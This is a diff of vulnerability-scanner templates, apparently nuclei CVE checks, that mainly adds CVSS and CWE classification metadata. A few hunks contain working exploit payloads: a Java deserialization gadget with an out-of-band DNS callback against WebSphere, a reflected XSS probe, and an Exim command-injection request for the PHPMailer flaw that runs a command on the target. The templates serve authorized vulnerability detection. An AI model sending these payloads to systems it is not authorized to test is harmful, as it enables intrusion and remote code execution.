<objectname xsi:type="ns1:javax.management.ObjectName">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>
|
||||||
<operationname xsi:type="xsd:string">getUnsavedChanges</operationname>
|
<operationname xsi:type="xsd:string">getUnsavedChanges</operationname>
|
||||||
<params xsi:type="ns1:[Ljava.lang.Object;">{{ generate_java_gadget("dns", "{{interactsh-url}}", "base64")}}</params>
|
<params xsi:type="ns1:[Ljava.lang.Object;">{{ generate_java_gadget("dns", "{{interactsh-url}}", "base64-raw")}}</params>
|
||||||
<signature xsi:type="ns1:[Ljava.lang.String;">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>
|
<signature xsi:type="ns1:[Ljava.lang.String;">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>
|
||||||
</ns1:invoke>
|
</ns1:invoke>
|
||||||
</SOAP-ENV:Body>
|
</SOAP-ENV:Body>
|
||||||
|
|
|
@ -7,6 +7,11 @@ info:
|
||||||
description: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.
|
description: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-8349
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-8349
|
||||||
tags: cve,cve2015,xss,sourcebans
|
tags: cve,cve2015,xss,sourcebans
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2015-8349
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -6,6 +6,11 @@ info:
|
||||||
description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.
|
description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.
|
||||||
reference: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro
|
reference: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro
|
||||||
tags: cve,cve2015,atlassian,confluence
|
tags: cve,cve2015,atlassian,confluence
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 4.30
|
||||||
|
cve-id: CVE-2015-8399
|
||||||
|
cwe-id: CWE-200
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -9,6 +9,11 @@ info:
|
||||||
- https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
|
- https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-8813
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-8813
|
||||||
tags: cve,cve2015,ssrf,oob
|
tags: cve,cve2015,ssrf,oob
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N
|
||||||
|
cvss-score: 8.20
|
||||||
|
cve-id: CVE-2015-8813
|
||||||
|
cwe-id: CWE-918
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -8,6 +8,12 @@ info:
|
||||||
- https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
|
- https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-9414
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-9414
|
||||||
tags: cve,cve2015,wordpress,wp-plugin,xss
|
tags: cve,cve2015,wordpress,wp-plugin,xss
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2015-9414
|
||||||
|
cwe-id: CWE-79
|
||||||
|
description: "The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter."
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -8,6 +8,12 @@ info:
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480
|
||||||
- https://www.exploit-db.com/exploits/37252
|
- https://www.exploit-db.com/exploits/37252
|
||||||
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.50
|
||||||
|
cve-id: CVE-2015-9480
|
||||||
|
cwe-id: CWE-22
|
||||||
|
description: "The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter."
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -7,6 +7,10 @@ info:
|
||||||
reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
|
reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
|
||||||
severity: high
|
severity: high
|
||||||
tags: cve,cve2016,adobe,aem
|
tags: cve,cve2016,adobe,aem
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.50
|
||||||
|
cve-id: CVE-2016-0957
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -6,6 +6,12 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000126
|
||||||
|
cwe-id: CWE-79
|
||||||
|
description: "Reflected XSS in wordpress plugin admin-font-editor v1.8"
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -7,6 +7,11 @@ info:
|
||||||
description: Reflected XSS in wordpress plugin ajax-random-post v2.00
|
description: Reflected XSS in wordpress plugin ajax-random-post v2.00
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000127
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -9,6 +9,11 @@ info:
|
||||||
- http://www.vapidlabs.com/wp/wp_advisory.php?v=161
|
- http://www.vapidlabs.com/wp/wp_advisory.php?v=161
|
||||||
- https://wordpress.org/plugins/anti-plagiarism
|
- https://wordpress.org/plugins/anti-plagiarism
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000128
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -7,6 +7,11 @@ info:
|
||||||
description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
|
description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000129
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -7,6 +7,11 @@ info:
|
||||||
description: Reflected XSS in wordpress plugin e-search v1.0
|
description: Reflected XSS in wordpress plugin e-search v1.0
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000130
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -6,6 +6,12 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000131
|
||||||
|
cwe-id: CWE-79
|
||||||
|
description: "Reflected XSS in wordpress plugin e-search v1.0"
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -7,6 +7,11 @@ info:
|
||||||
description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8
|
description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000132
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -7,6 +7,11 @@ info:
|
||||||
description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
|
description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000133
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -7,6 +7,11 @@ info:
|
||||||
description: Reflected XSS in wordpress plugin hdw-tube v1.2
|
description: Reflected XSS in wordpress plugin hdw-tube v1.2
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000134
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -7,6 +7,11 @@ info:
|
||||||
description: Reflected XSS in wordpress plugin hdw-tube v1.2
|
description: Reflected XSS in wordpress plugin hdw-tube v1.2
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000135
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -6,6 +6,12 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658
|
reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000137
|
||||||
|
cwe-id: CWE-79
|
||||||
|
description: "Reflected XSS in wordpress plugin hero-maps-pro v2.1.0"
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -6,6 +6,12 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38
|
reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000138
|
||||||
|
cwe-id: CWE-79
|
||||||
|
description: "Reflected XSS in wordpress plugin indexisto v1.0.5"
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -8,6 +8,12 @@ info:
|
||||||
- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
|
- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
|
||||||
tags: cve,cve2016,wordpress,wp-plugin,xss
|
tags: cve,cve2016,wordpress,wp-plugin,xss
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000139
|
||||||
|
cwe-id: CWE-79
|
||||||
|
description: "Reflected XSS in wordpress plugin infusionsoft v1.5.11"
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -6,6 +6,12 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000140
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000140
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000140
|
||||||
|
cwe-id: CWE-79
|
||||||
|
description: "Reflected XSS in wordpress plugin new-year-firework v1.1.9"
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2016-1000141
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Page Layout builder v1.9.3 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Reflected XSS in wordpress plugin page-layout-builder v1.9.3
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000141
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "</script><script>alert(document.domain)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -6,6 +6,12 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000146
|
||||||
|
cwe-id: CWE-79
|
||||||
|
description: "Reflected XSS in wordpress plugin pondol-formmail v1.1"
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -8,6 +8,12 @@ info:
|
||||||
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
|
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
|
||||||
tags: cve,cve2016,wordpress,wp-plugin,xss
|
tags: cve,cve2016,wordpress,wp-plugin,xss
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000148
|
||||||
|
cwe-id: CWE-79
|
||||||
|
description: "Reflected XSS in wordpress plugin s3-video v0.983"
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -6,6 +6,12 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000149
|
||||||
|
cwe-id: CWE-79
|
||||||
|
description: "Reflected XSS in wordpress plugin simpel-reserveren v3.5.2"
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -7,6 +7,11 @@ info:
|
||||||
description: Reflected XSS in wordpress plugin tidio-form v1.0
|
description: Reflected XSS in wordpress plugin tidio-form v1.0
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000152
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -6,6 +6,12 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000153
|
||||||
|
cwe-id: CWE-79
|
||||||
|
description: "Reflected XSS in wordpress plugin tidio-gallery v1.1"
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -7,6 +7,11 @@ info:
|
||||||
description: Reflected XSS in wordpress plugin whizz v1.0.
|
description: Reflected XSS in wordpress plugin whizz v1.0.
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000154
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000154
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000154
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -6,6 +6,12 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155
|
||||||
tags: cve,cve2016,wordpress,xss,wp-plugin
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000155
|
||||||
|
cwe-id: CWE-79
|
||||||
|
description: "Reflected XSS in wordpress plugin wpsolr-search-engine v7.6"
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -2,28 +2,27 @@ id: CVE-2016-10033
|
||||||
info:
|
info:
|
||||||
name: Wordpress 4.6 Remote Code Execution
|
name: Wordpress 4.6 Remote Code Execution
|
||||||
author: princechaddha
|
author: princechaddha
|
||||||
severity: high
|
severity: critical
|
||||||
description: The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property.
|
description: The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property.
|
||||||
reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
|
reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
|
||||||
tags: wordpress,cve,cve2016,rce
|
tags: wordpress,cve,cve2016,rce
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.80
|
||||||
|
cve-id: CVE-2016-10033
|
||||||
|
cwe-id: CWE-77
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |+
|
- |+
|
||||||
GET /?author=1 HTTP/1.1
|
GET /?author=1 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Cache-Control: max-age=0
|
|
||||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||||
Accept-Language: en-US,en;q=0.9
|
|
||||||
Connection: close
|
|
||||||
|
|
||||||
- |+
|
- |+
|
||||||
POST /wp-login.php?action=lostpassword HTTP/1.1
|
POST /wp-login.php?action=lostpassword HTTP/1.1
|
||||||
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
|
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
|
||||||
Connection: close
|
|
||||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Content-Length: 56
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
wp-submit=Get+New+Password&redirect_to=&user_login={{username}}
|
wp-submit=Get+New+Password&redirect_to=&user_login={{username}}
|
||||||
|
|
|
@ -9,6 +9,11 @@ info:
|
||||||
- https://cxsecurity.com/issue/WLB-2016080220
|
- https://cxsecurity.com/issue/WLB-2016080220
|
||||||
- https://wpvulndb.com/vulnerabilities/8609
|
- https://wpvulndb.com/vulnerabilities/8609
|
||||||
tags: cve,cve2016,wordpress,wp-plugin,lfi
|
tags: cve,cve2016,wordpress,wp-plugin,lfi
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.50
|
||||||
|
cve-id: CVE-2016-10956
|
||||||
|
cwe-id: CWE-20
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -3,13 +3,18 @@ id: CVE-2016-10960
|
||||||
info:
|
info:
|
||||||
